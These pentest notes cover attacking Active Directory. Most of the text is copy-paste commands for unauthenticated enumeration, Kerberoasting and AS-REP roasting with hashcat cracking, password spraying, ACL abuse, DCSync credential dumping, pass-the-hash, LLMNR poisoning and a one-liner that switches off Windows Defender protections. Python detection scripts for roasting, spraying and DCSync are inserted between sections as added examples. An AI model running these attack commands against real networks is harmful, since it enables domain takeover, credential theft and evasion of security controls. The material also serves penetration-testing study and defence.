Pentest_Notes

🏒 Active Directory Penetration Testing

Organized notes for Active Directory penetration testing. Last Updated: 2026-03-27


Overview

Active Directory (AD) is the backbone of most enterprise networks. AD pentesting involves enumerating the domain structure, identifying misconfigurations, exploiting trust relationships, and ultimately achieving domain dominance.

🔗 Essential Reference: Pentest AD Mindmap


Reconnaissance — Without Credentials

Checklist

User Enumeration with Kerbrute

# Kerbrute user enumeration
/Tools/kerbrute_linux_amd64 userenum -d domain.com --dc <DC_IP> $SECLIST/Usernames/Names/names.txt

# Use statistically likely usernames
# https://github.com/insidetrust/statistically-likely-usernames/tree/master/facebook-base-lists

💡 Pro Tip: Continue using Kerbrute until you have the naming schema, many users, and service accounts. Use service-accounts.txt for service account discovery.

ASREPRoasting Without Credentials

impacket-GetNPUsers domain.com/ -usersfile adcreds.txt -dc-ip <DC_IP> -request -outputfile hash.hash

ASREPRoast HackTricks Guide

SMB Enumeration (No Creds)

# Null session share enumeration
nxc smb <DC_IP> -u "" -p "" --shares
nxc smb <DC_IP> -u "guest" -p "" --shares
nxc smb <DC_IP> -u "a" -p "" --shares

# smbclient
smbclient -L //<DC_IP>/ -N

RPC Enumeration (No Creds)

# Null session
rpcclient <DC_IP> -U ""
rpcclient <DC_IP> -U "domain.com\guest"

# Comprehensive RPC enumeration
rpcclient -U 'domain.com\guest' -c "
    srvinfo;
    enumdomusers;
    queryuserdomainsid;
    enumgroups;
    enumdomgroups;
    enumprinters;
    enumservices;
    getdompwinfo;
    lsaenumsid;
    lsaqueryinfopol;
    querydispinfo;
    enumtrustdom;
    netshareenum;
    samrlookuprids;
" <DC_IP>

# SID lookup
lookupsids S-1-5-80-...

# impacket-rpcdump
impacket-rpcdump <DC_IP>

LDAP Enumeration (No Creds)

# Anonymous LDAP dump
ldapdomaindump <DC_IP>

# ldapsearch
ldapsearch -x -h <DC_IP> -b "dc=domain,dc=com"

Additional Unauthenticated Enumeration

# enum4linux
enum4linux -a <DC_IP>

Username as Password Check

nxc smb <DC_IP> -u adcreds.txt -p adcreds.txt --no-bruteforce
nxc smb <DC_IP>-160 --local-auth -u adcreds.txt -p adcreds.txt --no-bruteforce

⚠️ CPTS Exam Tip: Always try username:username for every discovered user. Also try default credentials like offsec:lab.


Enumeration — With Credentials

Checklist

Domain Information

# Get domain info
Get-NetDomain
Get-ADDomain

# Identify domain admins
net group "Domain Admins" /domain

# Domain trusts
Get-ADTrust -Filter *
Get-DomainTrust
Get-DomainTrustMapping

# Enterprise admins
net group "Enterprise Admins" /domain

User & Group Enumeration

# Current user info
whoami /groups /fo list | findstr Name
net user <username> /domain

# All domain users
Get-ADUser -Filter * -Properties *

# Service accounts (SPN set)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# Group members
Get-ADGroupMember -Identity "Backup Operators"
net group "Domain Admins" /domain

# OUs
Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName

Password Policy

# CrackMapExec
crackmapexec smb <DC_IP> -u <user> -p <pass> --pass-pol

# rpcclient
rpcclient $> querydominfo

# ldapsearch
ldapsearch -h <DC_IP> -x -b "DC=DOMAIN,DC=COM" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# Windows
net accounts
Get-DomainPolicy

BloodHound Collection & Analysis

# SharpHound collection (from Windows)
.\SharpHound.exe -c All --zipfilename bh.zip

# RustHound (from Linux)
rusthound -d domain.com -u user -p pass -f <DC_IP>

# Parse BloodHound JSON for descriptions
cat domain_users.json | jq '.[] | select(.attributes.description != null and .attributes.description[0] != null) | {sAMAccountName: .attributes.sAMAccountName[0], description: .attributes.description[0]}'

# Alternative BloodHound JSON parsing
cat bloodhound_users.json | jq '.data[] | select(.Properties.description != null) | {samaccountname: .Properties.name, description: .Properties.description}'

⚠️ CPTS Exam Tip: Always check AD user descriptions — passwords are frequently stored there.

ACL / ACE Enumeration

# Find interesting ACLs
Find-InterestingDomainAcl | select ObjectDN, AceType

# Get SID of specific user
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley

Share Enumeration with Credentials

# Check all shares
nxc smb <IP_RANGE> -u <user> -p <pass> --shares

# Mount and inspect shares thoroughly
# Use Mythicsoft Agent Ransack to search for files on Windows

LDAP Dump with Credentials

# LDAP dump
ldapdomaindump <DC_IP> -u 'domain\user' -p 'password'

# Check descriptions using jq
cat domain_users.json | jq '...'
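The jq one-liners above (BloodHound JSON and the ldapdomaindump output) both boil down to the same audit: find user descriptions that carry a password. The script below is an added example, not part of the original notes, that does the same check over both JSON layouts in Python so it can be run as a recurring hygiene audit. The record layouts are those the two tools produce (ldapdomaindump: a list of objects whose `attributes` values are lists; BloodHound: `{"data": [{"Properties": {...}}]}`); every sample record and account name in it is constructed.

```python
"""Audit AD user descriptions for credential-like content.

Added example, not part of the original notes. It reads the two JSON layouts
the jq one-liners on this page query: ldapdomaindump's domain_users.json
(a list of {"attributes": {...}} objects whose attribute values are lists) and
BloodHound's users.json ({"data": [{"Properties": {...}}]}). All sample records
below are constructed for the demo.
"""
import json
import re

# A password-ish keyword followed by a value-like token, e.g. "password: X" or "pwd=X".
CREDENTIAL_HINT = re.compile(r"\b(pass(word|wd)?|pwd|pw)\b\s*[:=-]?\s*\S+", re.IGNORECASE)

# Constructed ldapdomaindump-style records.
LDAPDOMAINDUMP_SAMPLE = json.dumps([
    {"attributes": {"sAMAccountName": ["svc_backup"],
                    "description": ["Backup service - password: Backup2024!"]}},
    {"attributes": {"sAMAccountName": ["jdoe"], "description": ["Accounting"]}},
    {"attributes": {"sAMAccountName": ["krbtgt"]}},          # no description attribute at all
])

# Constructed BloodHound-style records.
BLOODHOUND_SAMPLE = json.dumps({"data": [
    {"Properties": {"name": "SVC_SQL@DOMAIN.COM", "description": "SQL svc acct pwd=Summer2024"}},
    {"Properties": {"name": "ALICE@DOMAIN.COM", "description": None}},
    {"Properties": {"name": "BOB@DOMAIN.COM", "description": "Temporary creds: see ticket 1234"}},
]})


def iter_ldapdomaindump(raw):
    """Yield (account, description) from ldapdomaindump JSON; missing attributes become None."""
    for rec in json.loads(raw):
        attrs = rec.get("attributes", {})
        account = (attrs.get("sAMAccountName") or [None])[0]
        description = (attrs.get("description") or [None])[0]
        yield account, description


def iter_bloodhound(raw):
    """Yield (account, description) from BloodHound users JSON."""
    for rec in json.loads(raw).get("data", []):
        props = rec.get("Properties", {})
        yield props.get("name"), props.get("description")


def find_credential_descriptions(records):
    """Return [(account, description)] for descriptions that look like they hold a password."""
    hits = []
    for account, description in records:
        if description and CREDENTIAL_HINT.search(description):
            hits.append((account, description))
    return hits


if __name__ == "__main__":
    sources = (("ldapdomaindump", iter_ldapdomaindump(LDAPDOMAINDUMP_SAMPLE)),
               ("bloodhound", iter_bloodhound(BLOODHOUND_SAMPLE)))
    for name, records in sources:
        for account, description in find_credential_descriptions(records):
            print(f"[{name}] {account}: {description}")
```

The keyword regex is deliberately narrow (a password word followed by a value); "creds: see ticket" is not reported, which keeps the audit list short enough that someone actually clears the offending descriptions.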

Enumeration Resources


Kerberos Attacks

Checklist

🔴 Warning: Always use FQDNs (e.g., dc01.domain.com) not IP addresses for Kerberos attacks. Kerberos relies on DNS names.

Kerberoasting

# Linux — Impacket
impacket-GetUserSPNs -dc-ip <DC_IP> DOMAIN/user -request-user <target> -outputfile tgs.hash

# Enumerate SPNs with NetExec
nxc ldap <DC_IP_RANGE> -u 'user' -p 'password' --kerberoast spns.txt

# Crack TGS hash
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt --force

# Windows — Rubeus
.\Rubeus.exe kerberoast /user:testspn /nowrap

# Windows — PowerView
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Windows — Manual TGS request
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

ASREPRoasting

# Linux
impacket-GetNPUsers domain.com/user:'Password!' -dc-ip <DC_IP> -request -o ./hashes.kerb
kerbrute userenum -d domain.com --dc <DC_IP> /opt/jsmith.txt

# Crack AS-REP hash
hashcat -m 18200 hashes.kerb /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Windows — PowerView
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

# Windows — Rubeus
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
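The Kerberoasting and ASREPRoasting sections above both end in hashcat modes for RC4-HMAC material (13100 and 18200), which is also the detection angle on the domain controller: Event ID 4769 with TicketEncryptionType 0x17 from one account across many SPNs, and Event ID 4768 issued with Pre-Authentication Type 0. The script below is an added example, not part of the original notes, covering both; it assumes a simplified dict form of the fields a SIEM extracts from those events, and every event in it is constructed.

```python
"""Kerberoast and AS-REP roast detection over domain controller security events.

Added example, not part of the original notes. It assumes a simplified dict
form of Event ID 4769 (service ticket request) and 4768 (TGT request) with the
fields a SIEM would extract from the event XML; the events below are
constructed. Rationale: hashcat modes 13100 and 18200 crack RC4-HMAC
(TicketEncryptionType 0x17) material, so one account pulling RC4 service
tickets for many SPNs, or a TGT issued with Pre-Authentication Type 0, is what
a defender alerts on.
"""
from collections import defaultdict

RC4_HMAC = "0x17"
AES256 = "0x12"

# Constructed events: 4769 carries "service", 4768 carries "preauth".
EVENTS = [
    {"id": 4769, "account": "jdoe@DOMAIN.COM", "service": "MSSQLSvc/sql01", "etype": RC4_HMAC},
    {"id": 4769, "account": "jdoe@DOMAIN.COM", "service": "HTTP/web01", "etype": RC4_HMAC},
    {"id": 4769, "account": "jdoe@DOMAIN.COM", "service": "CIFS/fs01", "etype": RC4_HMAC},
    {"id": 4769, "account": "jdoe@DOMAIN.COM", "service": "krbtgt", "etype": RC4_HMAC},   # TGT-related, skipped
    {"id": 4769, "account": "jdoe@DOMAIN.COM", "service": "WS01$", "etype": AES256},       # computer account, skipped
    {"id": 4769, "account": "alice@DOMAIN.COM", "service": "CIFS/fs01", "etype": AES256},  # ordinary AES request
    {"id": 4768, "account": "mmorgan@DOMAIN.COM", "preauth": "0", "etype": RC4_HMAC},     # pre-auth not required
    {"id": 4768, "account": "alice@DOMAIN.COM", "preauth": "2", "etype": AES256},         # normal PA-ENC-TIMESTAMP
]


def kerberoast_suspects(events, threshold=3):
    """Map account -> sorted SPNs for accounts requesting >= threshold RC4 service tickets.

    krbtgt and computer-account (trailing $) services are skipped: RC4 requests
    for those occur legitimately and would only add noise.
    """
    spns = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        spns[e["account"]].add(svc)
    return {acct: sorted(s) for acct, s in spns.items() if len(s) >= threshold}


def asrep_roast_targets(events):
    """Accounts issued a TGT with no pre-authentication and RC4 (AS-REP roastable)."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == "0" and e["etype"] == RC4_HMAC})


if __name__ == "__main__":
    for acct, spns in kerberoast_suspects(EVENTS).items():
        print(f"possible Kerberoast by {acct}: {', '.join(spns)}")
    for acct in asrep_roast_targets(EVENTS):
        print(f"AS-REP issued without pre-auth for {acct}")
```

The cheapest mitigation follows directly from the check: service accounts with AES-only `msDS-SupportedEncryptionTypes` and long random passwords make the 4769 signal disappear, and clearing DONT_REQ_PREAUTH on the flagged accounts removes the 4768 one.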

Mimikatz Ticket Operations

# Ensure tickets are in base64
mimikatz # base64 /out:true

# Export tickets
kerberos::list /export

# Convert base64 ticket (Linux)
echo "<base64_blob>" | tr -d \\n
cat encoded_file | base64 -d > ticket.kirbi

# kirbi2john
python2.7 kirbi2john.py ticket.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > hash_for_hashcat

Password Spraying

# Kerbrute
kerbrute passwordspray -d domain.com --dc <DC_IP> valid_users.txt Welcome1

# CrackMapExec — safe spraying
sudo crackmapexec smb --local-auth <SUBNET> -u administrator -H <HASH> | grep +

# Windows — Invoke-DomainPasswordSpray
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
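Spraying is loud in a specific way: one source fails against many distinct accounts, each once or twice, inside a short window, which is the opposite shape of a single user mistyping a password until lockout. The script below is an added example, not part of the original notes, that scores failed-logon events for that shape. It assumes a simplified dict form of Event ID 4625 (SubStatus 0xC000006A, wrong password) and Event ID 4771 (Failure Code 0x18, pre-authentication failed); all events are constructed.

```python
"""Password-spray detection over failed-logon events.

Added example, not part of the original notes. It consumes a simplified dict
form of Event ID 4625 (failed logon, SubStatus 0xC000006A = wrong password)
and 4771 (Kerberos pre-authentication failed, Failure Code 0x18 = wrong
password); the events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Status values that mean "wrong password" (not "no such user", which sprays avoid).
BAD_PASSWORD_CODES = {"0x18", "0xc000006a"}


def _failure(ip, account, minute, event_id=4771, code="0x18"):
    """Build one constructed failed-logon event."""
    return {"id": event_id, "src": ip, "account": account, "status": code,
            "ts": f"2024-06-01T09:{minute:02d}:00"}


# Constructed: 10.10.14.5 tries six accounts within two minutes (spray shape), while
# 10.0.0.20 fails three times against the same account (a confused user, not a spray).
EVENTS = [_failure("10.10.14.5", f"user{i}@DOMAIN.COM", minute=i // 3) for i in range(6)] + [
    _failure("10.0.0.20", "bob@DOMAIN.COM", minute=m, event_id=4625, code="0xc000006a") for m in (5, 6, 7)
]


def spray_sources(events, min_accounts=5, window=timedelta(minutes=10)):
    """Return {source_ip: peak_distinct_accounts} for sources whose bad-password
    failures touched >= min_accounts distinct accounts inside any sliding window."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] in (4625, 4771) and e["status"].lower() in BAD_PASSWORD_CODES:
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["account"]))
    flagged = {}
    for src, fails in by_src.items():
        fails.sort()
        peak, start = 0, 0
        for end in range(len(fails)):
            # Slide the window start forward until the span fits inside `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            peak = max(peak, len({acct for _, acct in fails[start:end + 1]}))
        if peak >= min_accounts:
            flagged[src] = peak
    return flagged


if __name__ == "__main__":
    for src, n in spray_sources(EVENTS).items():
        print(f"spray-like activity from {src}: {n} distinct accounts")
```

Counting distinct accounts rather than raw failures is the point: a lockout-threshold spray stays under the per-account failure count that classic alerting keys on, but it cannot avoid touching many accounts.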

ACL Abuse

Overview

Access Control List (ACL) abuse is a critical AD attack vector. Misconfigured ACLs can allow privilege escalation through the domain.

# Find ACLs with modification rights to non-built-in objects
Find-InterestingDomainAcl

# Create credentials for ACL abuse
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $SecPassword)

# ForceChangePassword — Change user's password
$newPassword = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Set-DomainUserPassword -Identity <target> -AccountPassword $newPassword -Credential $Cred -Verbose

# GenericAll/GenericWrite — Add to group
Add-DomainGroupMember -Identity 'Target Group' -Members 'attacker' -Credential $Cred -Verbose

# Verify group membership
Get-DomainGroupMember -Identity "Target Group" | Select MemberName

# Set fake SPN for targeted Kerberoasting
Set-DomainObject -Credential $Cred -Identity <target> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

DCSync Attack

# Check user permissions for DCSync
Get-DomainUser -Identity <user> | select samaccountname,objectsid,memberof,useraccountcontrol | fl

# Mimikatz DCSync
mimikatz # lsadump::dcsync /domain:DOMAIN.COM /user:DOMAIN\administrator

# Impacket secretsdump (from Linux)
impacket-secretsdump domain.com/user:'password'@<DC_IP>
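Both DCSync commands above ask a domain controller for replication data, and the DC records that request as Event ID 4662 on the domain object carrying the DS-Replication-Get-Changes control-access GUIDs. Only domain controllers (computer accounts) and known directory-sync accounts should ever do that. The script below is an added example, not part of the original notes; it assumes a simplified dict form of 4662 with the Properties field as a string of GUIDs, and every event and account name in it is constructed.

```python
"""DCSync detection over Event ID 4662 (operation performed on an AD object).

Added example, not part of the original notes. It assumes a simplified dict
form of 4662 with the Properties field as the event reports it (a string of
access GUIDs); events below are constructed.
"""
# Control-access rights a replication request needs (well-known AD extended-right GUIDs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed events: a DC, a directory-sync service account, a regular user and an unrelated read.
EVENTS = [
    {"id": 4662, "subject": "DC02$", "object_type": "domainDNS", "properties": REPL_PROPS},
    {"id": 4662, "subject": "MSOL_4f2a1c", "object_type": "domainDNS", "properties": REPL_PROPS},
    {"id": 4662, "subject": "jdoe", "object_type": "domainDNS", "properties": REPL_PROPS},
    {"id": 4662, "subject": "alice", "object_type": "user",
     "properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder, not a replication GUID
    {"id": 4624, "subject": "jdoe"},                            # different event, ignored
]


def dcsync_suspects(events, allowlist=()):
    """Subjects that exercised replication rights without being a computer
    account (trailing $) or an explicitly allowlisted sync account."""
    hits = set()
    for e in events:
        if e["id"] != 4662:
            continue
        props = e["properties"].lower()
        if not any(guid in props for guid in REPLICATION_GUIDS):
            continue
        subject = e["subject"]
        if subject.endswith("$") or subject in allowlist:
            continue
        hits.add(subject)
    return sorted(hits)


if __name__ == "__main__":
    # The allowlist entry is a constructed example of a directory-sync service account.
    for subject in dcsync_suspects(EVENTS, allowlist=("MSOL_4f2a1c",)):
        print(f"replication rights used by non-DC principal: {subject}")
```

Keep the allowlist short and reviewed: any account on it holds domain-wide credential access, and the 4662 check is only as good as the audit policy (Directory Service Access auditing with a SACL on the domain object) that produces the events.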

Lateral Movement

Checklist

Session Enumeration

.\PsLoggedon.exe -accepteula \\COMPUTERNAME

Pass-the-Hash

# NetExec PtH
nxc smb <IP_RANGE> -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH>'

# CrackMapExec PtH
crackmapexec smb <IP_RANGE> -u Administrator -H '<NTLM_HASH>'

# impacket-psexec
impacket-psexec -hashes :<NTLM_HASH> domain.com/administrator@<IP>

Remote Execution with Credentials

# CrackMapExec command execution
crackmapexec smb <IP> -u Administrator -p 'Password!' -x 'whoami' --exec-method smbexec

# PSExec
impacket-psexec domain.com/user:'password'@<IP>

# WinRM
evil-winrm -i <IP> -u user -p 'password'

# PowerShell Remoting
Enter-PSSession -ComputerName <HOST> -Credential $cred

LLMNR/NBT-NS Poisoning

# Run Responder
responder -I eth1

# Crack captured NTLMv2 hashes
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt

Sensitive File Discovery

# Snaffler — find sensitive files across shares
.\Snaffler.exe -s -o snaffler_output.txt

Trust Enumeration & Cross-Domain Attacks

# Enumerate trusts
Get-ADTrust -Filter *
Get-DomainTrust
Get-DomainTrustMapping

# Enumerate SPNs in trusted domain
Get-DomainUser -SPN -Domain TRUSTEDOMAIN.COM | select SamAccountName

# Enumerate foreign group members
Get-DomainForeignGroupMember -Domain TRUSTEDOMAIN.COM

# Remote session to trusted domain
Enter-PSSession -ComputerName DC03.TRUSTEDOMAIN.COM -Credential DOMAIN\administrator

Miscellaneous Configurations

# Check for MS-PRN Printer Bug
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName DC01.DOMAIN.COM

# Check descriptions for passwords
Get-DomainUser * | Select-Object samaccountname,description

# Find accounts with PASSWD_NOTREQD
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Windows Defender & AV Evasion

Checking Defender Status

Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled, AntispywareEnabled | FL
Get-MpComputerStatus | Select IsTamperProtected, RealTimeProtectionEnabled | FL
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

Disabling Protections (Requires Admin)

# Disable UAC
cmd.exe /c "C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

# Disable realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable IOAV protection
Set-MpPreference -DisableIOAVProtection $true

# Disable behavior monitoring
Set-MPPreference -DisableBehaviorMonitoring $true

# Add exclusion path
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Disable cloud detection
Set-MPPreference -DisableBlockAtFirstSeen $true

# Disable email scanning
Set-MPPreference -DisableEmailScanning $true

# Disable script scanning
Set-MPPReference -DisableScriptScanning $true

# Exclude by extension
Set-MpPreference -ExclusionExtension "ps1"

# Nuclear option — disable everything + add exclusion
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"

🔴 Warning: Disabling AV protections may trigger alerts. Only do this when you have adequate access and operational security.

AppLocker Enumeration

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

AD PowerShell Module

# List available modules
Get-Module

# Import AD module
Import-Module ActiveDirectory

# PowerView import
Set-ExecutionPolicy Bypass -Scope Process
Import-Module C:\Tools\PowerView.ps1

Common Pitfalls / Gotchas

References & Further Reading

Merge wordlists

cat *.txt | sort -u > allnames.txt